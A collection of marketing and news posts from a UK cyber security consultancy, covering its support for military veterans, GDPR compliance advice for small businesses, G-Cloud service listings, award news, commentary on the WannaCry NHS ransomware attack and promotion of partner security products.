Honouring Our Armed Forces


Honouring Our Armed Forces

Honouring Our Armed Forces


Securestorm has recently signed an official agreement to honour the Armed Forces Covenant.

By extending the support to the Armed Forces Community, we recognise the value Serving Personnel both Regular and Reservists, Veterans and military families contribute to our business and our country. By directly getting involved with the Armed Forces Covenant, we extend and re-affirm our beliefs by actively supporting initiatives, taking up causes and voicing their messages in our actions.

Embedding the 'Core' Principles in Our Culture

Our Armed Forces fulfil the responsibility of protecting the realm on behalf of the Government, sacrificing some civilian freedoms, facing danger and, sometimes, suffering serious injury or death as a result of their duty. Families also play a vital role in supporting the operational effectiveness of our Armed Forces. In return, the whole nation has a moral obligation to the members of the Naval Service, the Army and the Royal Air Force, together with their families. They deserve our respect and support, and fair treatment.

"We (Securestorm Ltd.) will endeavour in our business dealings to uphold the key principles of the Armed Forces Covenant"

Securestorm not only acknowledges this agreement as an initiative but also holds these values deep within the company culture and origins. In fact, Securestorm Co-founder & CTO, Tony Richards served in the armed forces before making his mark on the Cloud & Cyber Security domains as an industry leader & strategist, especially working alongside and solving challenges for Public Sector organisations like the Ministry of Justice, Youth Justice Board, Supreme Court, and GDS, to name a few.

Showing Commitment & Support in Our Actions

As part of our on-going commitment we particularly seek to support the employment of veterans young and old, through actively targeting veterans in employment campaigns, actively supporting industry training and work placement schemes and mentoring veterans within the industry.

"We (Securestorm Ltd.) recognise the value serving personnel, reservists, veterans and military families bring to our business"

Drawing from our expertise and specialism in the security field and using our partnership with organisations like Amazon Web Services, we are able to contribute to important schemes like the AWS Re:Start. We recently hired and mentored a young veteran who is now on the path to becoming a Cyber Security Consultant. Along the way, he recieved regular support, technical training and qualifications, customer facing experience and an all important work contract from Securestorm. You can read about his journey below:

'A Veterans Journey to Civilan Life'



Tony Richards, commented "With years of experience in the army as well as working in a trending industry, my team and I are able to provide the 'right' nurturing and 'balanced' mentorship required to help the members of Armed Forces pick up and apply new skills suited to them as well as transition back to civilian life. We have already seen some great success in our involvement and we will continually do so in all our future endeavours".

We also take this opportunity to encourage other organisations and associates in our community to support and take up this cause of supporting the AFC. This goes beyond getting veterans back to normal life as the industry needs to recognize what they have to offer. There is a big opportunity to fully develop veterans’ skills and train them to be specialists in order to meet the rising national skills shortage in technology, particularly the vast field of Cyber and Cloud Security.

For more information on our involvement with the AFC or opportunities for Armed Forces, please get in touch with us on enquiries@securestorm.com. Don't forget to visit our other helpful content and handy resources:



Cost Effective GDPR Compliance for SMEs


Cost Effective GDPR Compliance for SMEs

cost effective gdpr compliance for sme'S

According to the latest survey results, the majority of SME businesses are unsure about meeting the GDPR compliance deadline. Moreover, a large part of the business community is unsure of the overall relevance of GDPR to their core business model and operations as well as the overall cost of compliance and business disruption it may cause.

So what should businesses do?

orange banner 4.png


orange banner 4.png


orange banner 4.png


orange banner 4.png


orange banner.jpg


  • Determine the relevance of GDPR to your business and operating model: GDPR is not about data protection, it is about personal data protection. It is important that businesses determine the degree of personal data they use. 

Actual personal data usage may be very different from perception. For example – a simple weather updates portal. It does not need any personal customer data however it does store and processe the names, addresses, family details, bank account numbers, passport details, work authorisations, salaries, bonus payments and sick leave details of its 50 geographically spread agents. All of these are personal data and some are sensitive data

  • Reorganise asset ownership and limit liabilities: SME owners should take advice on  reorganising their business ownership and asset ownership. Numerous businesses start as one man idea and then evolve to become a small team. But, due to digital connect or a people based operating model, they collect significant personal data. Owning sensitive assets with associate compliance and liabilities can best be addressed by forming corporate entities and limiting individual liability. 

The corporate entity should be the owner of share capital and owner of assets including data/digital assets – even if the product is an app available online with a relatively small number of users.

  • Consolidate data ownership: Personal data is an essential element of business flow. Many SMEs use online software-as-a-service tools to manage their business processes and since one tool may not give them all functionalities, data often resides in multiple sets. It’s therefore critical that businesses build their data asset inventory and document who is owner/active custodian of data sets available. 

This is good business practice and will provide GDPR and compliance objectives.

orange banner.jpg


  • Establish and evaluate scope of compliance: Consult your legal advisor to determine your scope of compliance. SMEs often operate as virtual organizations with staff working in different geographies and governed under different cyber security and data protection laws. Similarly, digital product consumption is global. It is therefore critical that SMEs draw a clear scope of compliance.

The scope of compliance needs to be evaluated to identify possible risk avoidance strategies, for example switching to a same country cloud service provider. Why climb the hill when you can go around it?

  • Determine optimum compliance budget: Businesses need to establish an optimum compliance budget. It is important that management considers overall scale, sensitivity and competition parameters on personal data use. If a business uses significant personal data then GDPR compliance is a necessity. If however, GDPR compliance is also expected to offer competitive advantage then it’s important to have marketing team on-board and share some costs. Organisations can subscribe to numerous GDPR compliance services rather than making capital investments.
orange banner.jpg


  • Evaluate “DPO as a service”: GDPR requires an organisation to appoint a person in the position of Data Protection Officer - DPO. But, it gives flexibility to have the DPO position as a full time, part-time, shared or a contract resource.  In order to reduce cost whilst maintaining compliance, SMEs must explore the option of appointing a shared DPO.

The DPO credential requirements are quite unique and “DPO as a service” provides SMEs the most efficient and practical support on compliance. The business should evaluate the DPO’s personal competence, intellectual property and support team available to address the variety of challenges that GDPR compliance is expected to present.

  • Move to a managed service model with suppliers and insist on their GDPR readiness: Outsourcing or specialised sourcing is a great way of implementing efficiency and business compliance. Due to shared cost overheads, the impact of particular compliance drops significantly. In line with this strategy, organisations should move to a managed service model for the parts of their business operations which fit their outsourcing strategy. During the implementation of a managed service strategy as a business or efficiency initiative, specialised focus should be given on compliance. This should reflect in the contractual terms that are entered as well as the governance framework for performance management. 

The Data controller will continue to remain accountable, sourcing a specialised and compliant data processor may just relieve management of large recurring compliance investments.

  • Market your GDPR compliance as a competitive strength: SMEs need to market the GDPR compliance of their product and business to derive competitive leverage. Large businesses have much higher at stake in terms of penalties and brand loss but they also have compliance budgets and programs for internal systems and processes. These compliance programs include ensuring current and prospective suppliers are GDPR compliant.

Being ahead in the race for compliance and marketing it as a strength would avoid elimination on compliance grounds and lend a power advantage during techno-commercial negotiations.

  • Implement cyber security hygiene practices: The key concern of regulatory (ICO) wrath will originate from two sources - A serious complaint from a data subject on systemic non-compliance or security incidents of personal data leakage impacting individual privacy. It’s therefore important to note that more than 70% of security incidents result from weak implementation of security basics, e.g. “admin-admin” username-password combinations, out dated unpatched systems, common password sharing, firewall any-any configurations, more than need/role based access, insider collusion, etc. 

Implementation of good security basics (refer to Cyber Essentials ©) which includes managerial and technical controls gives moderately strong data protection assurance to business management and will shield against higher penalties.

  • Take insurance cover: If the business is focussed on personal data, it is critically important that the organisation has cyber insurance cover. 

This cost will provide the necessary oxygen in case of multiple controls failure. With a constant rise in cyber incidents and a higher participation of insider agents (employees, ex-employees, suppliers staff), data leakages by error can lead to fines, loss of goodwill, disruption of operations and significant erosion of customer confidence and revenue. There could be additional liabilities emerging from suits that may be filed by customers, investors or partners.

orange banner.jpg


  • Embrace privacy be design: SMEs need to make a fundamental shift on data governance. Their products, processes and customer interactions need to respect personal data from collection to disposal. They need to evaluate concepts of data minimization, data segregation, data retention, identity management, disclosures, consent and lawful/agreed processing norms. The concepts of the data lean organisation needs to be implemented.

This is a cultural change which DPOs are expected to drive as they operationalise their roles for GDPR compliance.

Check out our content & resources:


GDPR will drive "Data Lean" Organisations


GDPR will drive "Data Lean" Organisations

orange banner.jpg


A Driving Force of 'DATA LEAN' Organisations

GDPR presents a unique opportunity for organisations to benefit from becoming “Data Lean”. This is a complete reversal of the current business mind-set where organisations collect maximum data about their current and potential customers because they believe it helps them to understand their needs better. The days of unauthorised data mining for upselling / cross selling certainly are numbered.

GDPR compliance necessitates organisations to change their business practices and data management systems. For example:

  1. Data Minimisation: The concept of data minimisation requires that only necessary data is collected as relevant to the business objective of the activity. Today organisations manually and automatically collect unnecessary data from customers so they have the option to mine it for future business purposes. Under GDPR, Data Controllers would be prohibited in collecting unjustified large data sets.
  2. Rights of Data Subject & Responsibilities of Organizations: GDPR grants individuals the right to enquire and seek all their personal details with the organisation to be provided within 30 days. Similarly, individual’s right to be forgotten implies an individual may demand deletion of all his/her personal data in all systems with the organisation. In order to comply, organisations will require all of their databases that contain personal data to be integrated or centrally managed across modern and legacy systems. Hence the limited the number of databases that store personal data the simpler the life for data controllers and processors.
  3. Data Processing, Sharing & Consent: GDPR requires organisations to seek individual consent for the purpose(s) that their personal data shall be used. It also requires explicit consent on sharing of data with 3rd parties and associates. Specific and Explicit consent provisions tie the hands of the organisations to “creative analytics” of personal data. It also limits organisation freedom to data partnerships for cross sales. Stretching the use of data to gain marketing leverage would certainly encourage individuals to use their right to object and/or withdraw consent.
  4. Data Relevance and Deletion: GDPR requires organisations to inform individuals how long their personal data shall be retained at the time of collection. To comply - organisations will need to envisage the time utility of data before the data collection activity and delete data after it has completed the committed time-frame. Alternatively, individuals are empowered to demand deletion at any time. This balance of rights would ensure that organisations only keep relevant data with themselves and adopt an effective data deletion policy.

GDPR compliance will drive organizations to maintain only necessary personal data which they need for agreed business purposes. While the cost of storing data is declining the cost of managing and safeguarding isn’t.

The advantages of becoming “Data Lean” include limited exposure to data loss issues, customer liabilities, regulatory wrath and goodwill damages as well as reduced cyber insurance premiums for compliant organisations.

Susheem Grover


Susheem is a Lead Consultant with 15 years of experience in Risk Management and Business Transformation Advisory with the services industries. He is a specialist in the GDPR and EU privacy regulations.




GDPR: Force for Good or an Evil Necessity ?


GDPR: Force for Good or an Evil Necessity ?

orange banner.jpg

GDPR: Force for 'Good' or an 'Evil' Necessity

by Alex Pavlovic - GDPR 'Strategist'

For those of you who were involved in the much maligned and, at the time, over-hyped Y2K or the ‘Millennium Bug’ you could be excused for thinking that with the General Data Protection Regulation (GDPR) there is a sense of déjà vu. 

The “It’ll never happen” versus the “sky is falling on our heads” camps seem to be resurfacing.


It’s been 20ish years since the Y2K project work started. I worked in a trading floor environment at the time and there was a huge, aka expensive, project to identify systems and processes impacted by the date change; the risks of doing nothing far outweighed the investment. Quite a few instances were discovered and we did identify issues with hardware and software.

Was it the end of the world like some predicted: No
Would it have impacted operations on January 2nd until they were fixed: Yes.  
Would we have been able to trade: hmm, tricky - quite a few database and spreadsheet issues were identified. But was it a timely overhaul of outdated systems and processes: Yes.

What the lead up to Y2K did do was focus staff, and most importantly, the executive’s & senior management’s attention to the risks and impact of not doing anything - sound similar to some current conversations ?  
The risks of doing nothing far outweighed the investment; at the time there were early and late remediation adopters.

Did that result in getting systems, infrastructure and controls updated (things which IT had been crying out for): Yes.


GDPR has rightly been identified and embraced by organisations (it could be said, long overdue) and plans are finally being developed to rectify the omissions in technical and organisational controls/measures. High profile projects once again have the Executives’ attention and support, albeit grudgingly in some cases.  Commitment for resource and budgets are once again being given and remediation work has commenced.  


If the controls aren’t implemented will it be the end of the world: No, though it could knock a hole in a company's finances.
Will it impact operations: it could do if a regulator orders a company to halt processing.
Will it be a timely overhaul of outdated systems and processes: I certainly hope so !

Thoughts ?
Leave your comments down below...



GDPR 'Strategist' &
Lead Consultant

Alex is a Lead Consultant with 25 years of IT, Audit, Information Security and Risk Management experience. He is a specialist in the GDPR and is an advisor and implementation manager for multiple clients across a wide range of industries.

If you are interested to run or participate in GDPR sessions, contact: alex@securestorm.com 

Visit our content:



Cloud Champion


Cloud Champion

Meet techUk'S 'Cloud Champion'

Cloud is fundamental to the UK’s digital future. But an organisation’s decision to move to the cloud will mean organisational change. Leading employees, particularly IT professionals, feeling anxious about how the cloud will impact the way they work. This level of change will for many be a significant step change and cultural shift in how IT services are consumed. If not properly managed organisations could struggle to fully optimize the full potential of cloud.

The purpose of techUK’s ‘Cloud Champion’ campaign is to showcase technology leaders that are playing a leadership role in championing and supporting organisation’s move to the cloud. The campaign will highlight best practice by leaders that are creating cloud enabled organisations, across all sectors, and a cloud driven workforce that will be vital for the UK’s digital future.

Securestorm are techUK members and fully support the organisation's wider initiatives by  participating in meaningful dialogues, strategy measures and thought-leaderships. Read the recent coverage about the 'Trust In Cloud' initiative and access the research papers here.

About: Securestorm are dynamic cyber security experts that delivers practical advice with the aim of meeting and solving challenges across Cloud and Cyber Security domains. With a combination of experience, expertise and strategy, Securestorm offers guidance to clients across Public and Private sectors.
Securestorm holds several accreditations, notably being NCSC Certified Cyber Security Consultancy, Crown Commercial Suppliers, and ISO:27001. Furthermore, Securestorm are also industry prominent for its proven delivery capabilities.


Meet Chris: Army Combat Engineer to Cyber Security Professional


Meet Chris: Army Combat Engineer to Cyber Security Professional

a veterans journey to civilan life

                            Chris Smith, Royal Engineer                                         British Army

                            Chris Smith, Royal Engineer
                                        British Army

When Chris Smith, a Royal Engineer veteran, left the military recently he wasn't sure what to do next — a dilemma for many former military personnel.

But Chris eventually found his calling in the technology industry, and is now rapidly making the transition from military life to the professional services environment.  

Chris's move into technology began when he enrolled into the AWS re:Start initiative where his interest in the area of Cyber Security got him a work placement with Securestorm Ltd.

Chris said, "I was initially lost, but once I found out about the opportunities within Cyber Security and the support available to me, I knew this was my future. The Securestorm placement combined with AWS re:Start initiative gave me direction, confidence and re-assurance which is vital to anyone who is coming out the military and pursuing a completely new avenue. Most folks do not realize how daunting the transition to civilian life can be!"
Chris 3.JPG

Army Engineer

Typical Day at the Army

Chris 2.JPG

On a 'Mission'

Military life


Chris is now a Security Analyst for Securestorm Ltd., the leading Cloud and Cyber Security consultancy based in London. As a National Cyber Security Center (NCSC) certified organisation, Securestorm works closely with public and private sector clients advising on security matters. This gives veterans like Chris a first-hand working experience within a diverse setting and an all-round exposure facing various customers across the industry.

  Giving Veterans a Fresh Start in Technology

Building Talents: The AWS re:Start Programme for Military & Securestorm Placement Program

The AWS re:Start for Military is aimed at supporting members of the UK Armed Forces community and guards with training and job placement program. This program is designed to educate young adults, military veterans, members of the military reserve, those leaving the Armed Forces, and service spouses on the latest software development and cloud computing technologies. Securestorm are AWS partners and are heavily involved in getting new minds get the necessary training, education and development to make it in the field of Security.


                  Interview: Meet the Recent Graduates

As the visionary head of Securestorm, CEO Mandeep Obhrai stated, "We are committed to our partnership with AWS as we embark on diverse initiatives from bringing innovative security solutions to supporting the community around us through a well-developed training and placement program. As a start-up with multiple achievements in our sector, we can help inspire, motivate and mentor new starters in technology on a very personal level with adequate support and nurturing along the way".
Army veteran turned leading Cyber & Cloud strategist, Tony Richards, CTO & CISO of Securestorm said, "While most former military personnel do not have cyber-security training, they do have compatible skills, teamwork spirit and are extremely focused by nature. These qualities are essential to our industry. Being receptive to learning, development and mentor-ship are perhaps more important than having only technical skills especially considering the fast-pace changes in the digital cyber industry.
Image uploaded from iOS (3).jpg
Image uploaded from iOS (2).jpg


AWS Summit 2017 - CTO/CISO Tony Richards with AWS re:Start hire Chris Smith

AWS Summit 2017 - CTO/CISO Tony Richards with AWS re:Start hire Chris Smith

He also added, "We have a collective role to provide support for veterans. At Securestorm, we believe in building upon initiatives such as the AWS re:Start. This goes beyond getting veterans back to normal life as the industry needs to recognize what they have to offer. There is a big opportunity to fully develop veterans’ skills and train them to be specialists in order to meet the rising national skills shortage in technology, particularly the vast field of Cyber and Cloud Security.

get involved with us !

As part of our commitment to the industry, Securestorm provides a broad range of training, learning and development initiatives for our people to achieve their career goals.

For questions and queries related to Security advice or interviews please email: enquries@securestorm.com. For current employment opportunities email: careers@securestorm.com. 


On Cloud 9


On Cloud 9

No. 9 brings a single iteration of 'G-Cloud'

G9 has officially replaced G-Cloud 7 (G7) and G-Cloud 8 (G8) to bring about consistent information about all services to bring more of the G-Cloud buying journey online.

Buyers and suppliers will be able to use one set of contracts for all their G-Cloud services.

securestorm on g-cloud 9

Securestorm has been officially been awarded G-Cloud 9 status following the success of the previous G-Cloud versions. Securestorm are committed to bring innovative as well as cost effective solutions and services that are practical to help Government organisations be secure from cyber-threats as well as manage resources effectively.  

Securestorm CTO, Tony Richards, added "It is great to be live on G9. Keeping in-line with the launch of previous G-cloud iterations, Securestorm is further committed to delivering more, offering streamlined services and exclusive solutions such as the award-winning EdgescanThis combined with our industry experience, delivery capabilities and subject matter expertise on trending threats will no doubt once again see us successfully solving security challenges for our clients across the Government." 

The following services by Securestorm can be found on the Digital Marketplace:




Cloud services such as Amazon Web Services or Salesforce are increasingly being used but often do not utilize all of the security options available.

Securestorm, an NCSC certified Cyber Security Consultancy, assists customers in defining their security needs and designing and assuring security of public, private or hybrid cloud services.


  • Certified under the NCSC Cyber Security Consultancy scheme
  • AWS Partner
  • Certified (CCP) Cyber Security Professionials
  • Cloud Security Alliance STAR Lead Auditors
  • (ISC)2 Certified Cloud Security Professionals (CCSP)
  • Cyber Essentials certified company
  • AWS secure for OFFICAL Architectal Design and Cloud Formation Templates
  • Leaders in secure OFFICIAL environments architecture design and review
  • Review of AWS or Salesforce Identity & Access Management permissions
  • Review security options chosen and those available against best practices
  • Assessment and review of AWS instances and configurations


  • Company certified under the NCSC Cyber Security Consultancy scheme
  • Deep dive Security Assurance and Audit previously conducted of AWS
  • Ensures compliant and secure cloud services for your organisational needs
  • Utilising the inherent security of cloud services for reduced complexity
  • Understanding of security options for current or future deployments
  • Recommendations for user role and privileges to meet business requirements
  • Improved audit and incident response capability
  • Expertise in delivering secure cloud services to existing G-Cloud customers
  • Deep dive Security Assurance and Audit previously conducted of Salesforce

Securestorm are actively working to champion Cloud Security best practices that enable Government and businesses to run more efficiently and cost effectively. Read about our contribution and best practices in a recently published research papers:



Edgescan - Continuous Technical Security Vulnerability Assessment

Edgescan is a managed, Continuous Technical Security Vulnerability Assessment service with continuous, security testing and system visibility that delivers a unique service combining full-stack vulnerability management, asset profiling, alerting and risk metrics. As official partners, Securestorm, an NCSC certified company, will assist customers with on-boarding the service and portal configuration.





Knack - "Low Code" Application and Database Pilot Development platform

Knack is an easy to use "Low-Code" development platform that Securestorm can provide as a pilot development service that lets you quickly build online applications and data databases as a proof of concepts. With Knack you can structure data, connect by linking related records together and extend data integrations.

Knack Low Code Development Platform Consultancy

Securestorm provides expert consultancy on how to use Knack, the "Low-Code" development platform, including: setup, configuration, management and development. Knack is an easy to use "Low-Code development platform", suitable for OFFICIAL information, that transforms data into powerful online databases, with clean interfaces, and requires no coding.




Nol-ij, the Continuous Information Risk Management Dashboard

Nol-ij is a cost effective, Continuous Information Risk Management Dashboard, that supports and streamlines governance, information risk management and security assurance through identification, evaluation, treatment and management of strategic, operational and project security risks, ensuring decision makers have the necessary information at their fingertips to confidently manage their risk portfolio.

Nol-ij Configuration, CUSTOMIZATION and Support Consultancy

Nol-ij, the Continuous Information Risk Assessment Dashboard can help organisations identify, track and minimize the information risks inherent in their systems and services. Securestorm provides expert consultancy to assist and enable organisations to setup, configure or even adapt and customize the Dashboard to their needs.



To request for a for additional information on any services tailored to your organisation's infrastructure, budget and considerations please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation. Additionally visit our technology services directory www.Informd.Online to view assurance reports services.


Road to Victory


Road to Victory


Securestorm Ltd. are pleased to announce that they have been selected as finalists in the Consulting Practice of the Year for the 2017 Cyber Security Awards. The Cyber Security Awards were established in 2014, to reward the best individuals, teams and companies within the cyber security industry. Excellence and innovation are core themes, throughout all categories. The Cyber Security Awards team, reviews the industry, looking for the best possible applicants.

The winners will be announced at the Cyber Security Awards dinner and presentation at the Chelsea Harbour Hotel on Thursday 29th June 2017.

Awards judge Karla Jobling said “there were more applicants this year than ever before and to be selected as a finalist is a great achievement. The Cyber Security Awards really focus on success and innovation, and we look for those who have passion, for what they are achieving within Cyber Security. I am excited to celebrate with all finalists in June, and announce those that judges feel are deserving winners.”

Mandeep Obhrai, CEO Securestorm stated "We are proud to be finalists for the best consulting practice of the year.  Over the past few years cyber-threats have evolved and we have been marking our success based on how we have delivered practical solutions to critical cyber challenges faced by our high-profile clients. This approach has carried us far and earned us the title of being the industry experts." 

Tony Richards, CTO Securestorm said on the occasion "This is a good motivation for our achievements. We have been hard at work getting on-board a number of specialist Cyber Security frameworks and among the few who are NCSC Certified for various cyber security services from the very start. We hope to use this news to fuel our drive for furthering our technical expertise in the industry."

About the Cyber Security Awards

Situated at the luxury 5* Chelsea Harbour Hotel London, the Cyber Security Awards is a leading awards event for the cyber security industry. The event consisted of reception drinks, 3 course meal with wine, coffee and petit fours. The cyber security awards is the ideal event to gain recognition for your success within the cyber security industry. At the awards, you can expect to network with leading industry professionals from consultancies, technology firms, defence businesses, FTSE 250 and public sector bodies.

About Securestorm

Securestorm Ltd. are leading cyber security experts that provides practical advice with the aim of simplifying challenges in the domains of Cloud and Cyber Security. With a combination of experience, expertise and strategy, Securestorm brings innovative delivery and subject matter expertise to the industry across Public and Private sectors. Securestorm are NCSC Certified Cyber Security Consultancy for Risk Assessment, Risk Management, and Audit & Review. Furthermore, Securestorm are also an approved CCS, CESG, Cyber Essentials and ISO 27001 certified consultants with presence on the G-Cloud, Cyber Security Services 2 and Digital Outcomes and Specialist 2 frameworks.


State of Malware


State of Malware


NHS Malware 2.jpg


'Ransomware' got the nation taking


The NHS cyber-attack that hit hospitals across the UK is said to have been part of the biggest ransomware outbreak in history and it could ramp up again this week as people return to work. UK hospitals have effectively shut down and are turning away non-emergency patients after ransomware ransacked its networks.

Some 16 NHS organizations including several hospital trusts have had their files scrambled by a variant of the WannaCrypt, aka WanaCrypt aka Wcry, nasty. Users are told to cough up $300 in Bitcoin to restore their documents. Services in other countries – including Russia, Taiwan and Kazakhstan – were also affected by similar hacks. Experts say the virus, called exploits a vulnerability in Microsoft Windows software that was first identified by American spies at the NSA.

Doctors have been reduced to using pen and paper, and closing A&E to non-critical patients, amid the tech blackout. Ambulances have been redirected to other hospitals, and operations canceled.

industry experts ANLYSIS


Securestorm's approach to tackle high-impact attacks such as the NHS breach is the same that has proven to be effective with other high-profile organisations. We look at problems practically and holistically. This enables us to deliver innovative and tailored approach that suit the organisation while placing considerations on resources and other factors like cost and time.


Tony Richards, CTO of Securestorm who actively works-alongside Government organisations has been monitoring and advising organisations to help defend and protect against such attacks added, "Microsoft released a fix, or patch, for the issue in March prior to the dump. However computers that did not install the update, or could not due to the age of the software, would have been left vulnerable to an attack". He also stated how the use of Abatis HDF software would have helped these organisations to protect, defend against the very same attacks while proving to be cost-effective at the same time. Subsequently, he tweeted - 

Mandeep Obhrai, CEO of Securestorm analysed the importance of long-term organisational planning along with embedding a security culture that is practical. He recommends:

  • Robust business continuity planning
  • Crisis and incident response planning
  • Excellent security hygiene policies and user awareness 
  • Up-to-date patch and vulnerability management 
  • Access control and user privileges are important
  • Back-up data using relaible solution for protection. 

'Beating ransomware is about preventing it rather than reacting to it. Invest in awesome Cyber Security !' 
- Mandeep Obhrai, CEO

Securestorm can offer expert advice and consultancy services to organisations while developing the overall security posture, maturity and culture. We have lead, integrated with and supported multiple teams within organisations to be cyber ready. As such there is no one-stop solution for incidents but this is where consulting us benefits organisations as are accredited and experienced to adeptly look into different areas. Read about our case studies here.

For the ransomware incident, we have identified Abatis software as one of the solutions as defense. The following are features and benefits of this particular software.

‘A Disruptive Zero Day Defence’ solution against HACKERS'



Securestorm Ltd., London based Cloud and Cyber security experts and NCSC Certified Consultants have officially partnered up with ABATIS, a UK based Cyber Security Awards 2015: Innovative Product of the Year winner to offer a resilient, cost-effective and agile solution that stops zero day attacks.

Abatis is deployed on end point workstations and servers to enforce corporate security policy and provides detailed analysis and audit information.

  • Less than 100KB Kernel Level Protection
  • Preserves the integrity of whatever device it is installed upon
  • Protects All Windows and Red Hat Linux





  • "Effective at stopping all attempts to write malware to the permanent storage of the device regardless of system privilege"
  • "Abatis Stopped 100% of all malware in comparative tests where 8 well-known Anti-Virus tools scored between 30% and 55%”
  • Provides an APT HUNTER-KILLER ability not seen in any other tool
  • Safe to use in mission and safety-critical real-time systems and SCADA environments
  • Provides TOTAL Control over USB Devices




"Defence Against Crypto Locker and Other Ransomware“

Ransomware is one of the fastest growing methods for cyber criminals to extort money. Abatis stops these attacks dead. Ransomware is one of the fastest growing methods for cyber criminals to extort money from their victims. In the first six months of 2014 cyber criminals made over $100 Million in extortion, many of these victims had no option but to pay up or lose sensitive corporate information. Abatis stops these attacks dead.




Fast, Light and Efficient

  • "Saves 7% of the energy consumed by the device, servers run 8°C cooler, saving £35 / €50 / US$60 per server per annum”
  • Imperceptible performance impact
  • Up to 40% performance (speed) improvement compared to traditional AV
  • Massive improvement in laptop battery duration


  • Making Security Management Simple and Cost-Effective
  • Central Management Console (CMC) provides facilities to:
  • Install on an estate
  • Retrieve and analyse logs
  • Push policy updates to Abatis individually, in groups or globally
  • Web based application
  • SIEM-like dashboard


Abatis is a host based software only solution that is implemented as a kernel driver on Windows platforms. It intercepts and mediates file write access to the computer’s permanent. It is designed to help enforce system and file integrity without complex management overheads. It achieves this security objective by exercising robust access control over the writing of executable files and user-defined files (protected files) to a computer. It protects against unauthorized modification and denies unauthorized write operations.

While Abatis blocks unwanted executables by default, the Abatis system administration can define files for integrity protection according to the computer’s roles. Ideally, Abatis should be deployed on a newly installed ‘clean’ operating system. From this secure initial state (baseline), Abatis will prevent malware infection then on.

For most corporate environments, Abatis is rolled out at stages and there may be extant undetected infections on systems – often referred to as Advanced Persistent Threats (APTs). Abatis' unique operation and extensive audit log allows the malware to be identified. Abatis can also reveal rootkit infections and facilitates the subsequent removal of such programs.




orange tick.jpg

Securestorm are authorized re-sellers of the Award winning software and management console solution from Abatis that helps stop malware cost-effectively and right from the get-go.


With Securestorm, you get unparalleled expert advice, excellent customer care support and guidance pre-and-post on-boarding process giving our clients peace of mind and massive savings on cost, time and resources.

To request for a for additional information on malware & ransomware defense and protection tailored to your organisation's infrastructure, budget and considerations please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation.



Small Budgets Cripple Cyber Security Efforts of Local Governments


Small Budgets Cripple Cyber Security Efforts of Local Governments

Small Budgets Cripple Cyber Security Efforts of Local Governments

A survey of local government chief information officers finds that insufficient funding for cyber-security is the biggest obstacle in achieving high levels of cyber safety.

Inadequate budgets are the largest obstacle for local government chief information officers in obtaining the highest level of cyber security for their organization, according to a survey released by the International City/County Management Association.

According to 411 respondents in the Cyber security 2016 survey, 32% reported seeing an increase in cyber attacks to their organizations within the past 12 months. But despite this increase, more than half of the CIOs surveyed found steep obstacles still stood in their way of achieving the highest level of cyber security as possible.

Survey respondents pointed to these reasons as the barriers to obtaining high cyber-security levels:

  • 58% noted inability to pay competitive salaries
  • 53% attributed small cyber-security staff as the main obstacle
  • 52% cited overall lack of funds

Although adequate funding was listed as the top need in achieving the highest level of cyber security for local governments, improved cyber-security policies ranked as No. 2, followed by government employees having a better understanding of cyber-security as No. 3, according to the survey.


"The threat landscape is ever evolving"

Rather than treading over old ground, it’s time to step forward to address the ever widening gap between criminal capability and intent, and our capability to defend ourselves. While the National Cyber Security Center (NCSC) initiatives are in place and taking effect for the long-term goal of securing the nation as a whole, the industry needs to work-along side these measures to ensure progress and continuity as a collective unit.

As NCSC Certified Consultants actively working closely with the Government sector we strongly believe:

  • getting the basics right could prevent 85% of breaches
  • that moving to a secure culture by actively working with teams will change mindsets
  • measuring that culture periodically will help review and fix gaps
  • sharing information between departments and organisations will unify the common goal of being secured
  • building capability internally will lead to long-term resource, time and cost savings

Securestorm has worked with clients facing constraints when it comes to budget, expertise and security culture gaps by way of offering practical solutions that addresses the organisational goals when it comes total cyber security. Recently, Securestorm signed a partnership with Edgescan Ltd. to bring a solution that provides the necessary flexibility & efficiency to departments facing such hurdles. Securestorm also offer services to on-board and manage the solution so that internal resources can focus on other organisational priorities. This ensures cost, time and resource savings while receiving expertise that can transform the entire security culture of the organisation. 

Read about managed CONTINUOUS security vulnerability assessment service

Edgescan takes into account cloud security by focusing on internal and external vulnerabilities (web applications as well as network infrastructure). It also delivers the flexibility, simplicity and manageability that organizations need to take control of cyber security and prevent web and network attacks. Edgescan is a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiency, lowering your overall cost of ownership.

As official Edgescan G-Cloud suppliers and certified consultants, Securestorm can offer expert services that helps lessen the burden on your security team and improve overall organisational security posture by:

  • Providing continuous visibility to your on premise and cloud environments
  • Freeing your security team to work on more strategic priorities
  • Satisfying compliance with regulations
  • Safeguarding your critical data
         Presenting Vulnerability Management Service at SOCITM SPRING 2016

         Presenting Vulnerability Management Service at SOCITM SPRING 2016

       As partners, Securestorm are official G-Cloud Suppliers of Edgescan solution

       As partners, Securestorm are official G-Cloud Suppliers of Edgescan solution

meeting opportunity: Securestorm & edgescan at infosecurity

Securestorm will join Edgescan at Infosecurity Europe, 06-08 June at Olympia, London. Visitors can learn about full-stack vulnerability management solution



The Edgescan Vulnerability Assessment & Management by Securestorm is available to procure via the G-Cloud space. The service information can also be found on our own assured service directory 'Informd.Online' with a free registration for Government departments.

To request for a trail or for additional information on the vulnerability assessment and management approach tailored to your organisation's infrastructure, budget and considerations please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation.


'Trust in Cloud'


'Trust in Cloud'

Building Trust in the Security of Cloud


tech-UK represents the companies and technologies that are defining today the world that we will live in tomorrow. More than 900 companies are members of tech-UK. Collectively they employ approximately 700,000 people, about half of all tech sector jobs in the UK.

The event marked the launch of tech-UK's Building Trust in the Security of Cloud papers and a panel discussion with leading cloud industry figures on building trust in the security of cloud computing.

The series of papers are aimed at addressing common trust and security concerns, as well as misconceptions, surrounding cloud services. Despite many years of raising awareness of the benefits offered by cloud computing some negative perceptions remain about the security of cloud services that are holding back cloud adoption and its benefits. Given the importance of cloud computing to the UK’s digital future it is vital that the cloud security messages and advice being delivered today are relevant to how cloud services have evolved, address the concerns being raised by cloud users and are communicated to and understood by the right audiences.

To ensure this happens tech UK has been working with cloud computing and cyber security industry experts to develop a series of papers aimed at providing information and advice for consumers, SMEs and local government leaders that are looking to get the most out of cloud computing. The following papers will be launched and discussed at the event:


Securestom's Tony Richards, CTO/CISO/Cyber and Cloud Security Strategist at the Panel Discussion Committee for Building Trust in the Security of Cloud

Securestom's Tony Richards, CTO/CISO/Cyber and Cloud Security Strategist at the Panel Discussion Committee for Building Trust in the Security of Cloud

